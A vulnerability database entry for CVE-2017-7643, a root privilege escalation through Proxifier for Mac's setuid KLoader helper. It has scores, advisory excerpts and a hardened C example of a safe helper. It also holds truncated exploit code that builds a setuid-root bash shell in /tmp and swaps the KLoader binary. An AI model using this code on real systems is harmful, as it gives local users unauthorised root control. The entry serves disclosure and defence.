CVE-2017-7643
Published 2017-04-14
CVE-2017-7643: Proxifier for Mac before 2.19 allows local users to gain privileges via the first parameter to the KLoader setuid program.
Priority: P343, high, 7.8 (CVSS 3.1)
AV:L AC:L PR:L UI:N S:U C:H I:H A:H
EXPLOIT
EPSS: 0.97% (57.2th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| proxifier | proxifier | < 2.19 | 2.19 |
CVSS provenance
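| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |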
No detection rules found.
Exploit-DB
Proxifier for Mac 2.19 - Local Privilege Escalation
exploitdb·2017-12-06·CVSS 7.8
CVE-2017-7690 [HIGH] Proxifier for Mac 2.19 - Local Privilege Escalation
---
# With CVE-2017-7643 I disclosed a command injection vulnerability in the KLoader
# binary that ships with Proxifier a.c
#include
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
gcc -o /tmp/a a.c
cat > a.c
#include
#include
#include
#include
int main(int ac, char *av[])
{
if (geteuid() != 0) {
printf("KLoader: UID not set to 0\n");
return 104;
} else {
seteuid(0);
setuid(0);
chown("/tmp/a", 0, 0);
chmod("/tmp/a", strtol("4755", 0, 8));
rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
execv("/Applicat
Exploit-DB
Proxifier for Mac 2.17/2.18 - Privesc Escalation
exploitdb·2017-04-11
CVE-2017-7643 Proxifier for Mac 2.17/2.18 - Privesc Escalation
---
# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a
KLoader binary which it installs suid root the first time Proxifier is run. This
binary serves a single purpose which is to load and unload Proxifier's kernel
extension.
Unfortunately it does this by taking the first parameter passed to it on the
commandline without any sanitisation and feeding it straight into system().
This means not only can you load any arbitrary kext as a non-root user but you
can also get a local root shell.
Although this is a bit of a terrible bug that shouldn't be happening in 2017,
Proxifier's developers fixed the issue in record time so th
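A hardened shape for a setuid kext helper, set beside the system() pattern the advisory describes. This is an added example, not Proxifier's code or its actual fix; the action words, the KEXT_PATH placeholder and the function name build_kext_argv are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical placeholder: the helper, not the caller, decides which kext is used. */
#define KEXT_PATH "/Library/Extensions/Example.kext"

/* Vulnerable pattern described above, kept only for contrast:
 *     snprintf(cmd, sizeof cmd, "kextload %s", argv[1]);
 *     system(cmd);    // argv[1] is parsed by /bin/sh while euid == 0
 */

/* Map the caller's argument to a fixed argv. Returns 0 on success, -1 if
 * the argument is not exactly one of the two allowed action words. */
int build_kext_argv(const char *action, const char *out[3])
{
    if (action == NULL)
        return -1;
    if (strcmp(action, "load") == 0)
        out[0] = "/sbin/kextload";
    else if (strcmp(action, "unload") == 0)
        out[0] = "/sbin/kextunload";
    else
        return -1;
    out[1] = KEXT_PATH;   /* never taken from the command line */
    out[2] = NULL;
    return 0;
}

/* Fixed environment so inherited variables cannot influence the child. */
static char *const clean_env[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };

int main(int argc, char *argv[])
{
    const char *kargv[3];
    if (argc != 2 || build_kext_argv(argv[1], kargv) != 0) {
        fprintf(stderr, "usage: %s load|unload\n", argv[0]);
        return 64;
    }
    /* execve with an absolute path: no shell and no PATH lookup. */
    execve(kargv[0], (char *const *)kargv, clean_env);
    perror("execve");
    return 111;
}
```

Because the caller can only select between two fixed argument vectors, no caller-supplied string reaches a shell or names the kext.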
No writeups or analysis indexed.
http://seclists.org/fulldisclosure/2017/Apr/54
https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
https://www.exploit-db.com/exploits/41854/
Published: 2017-04-14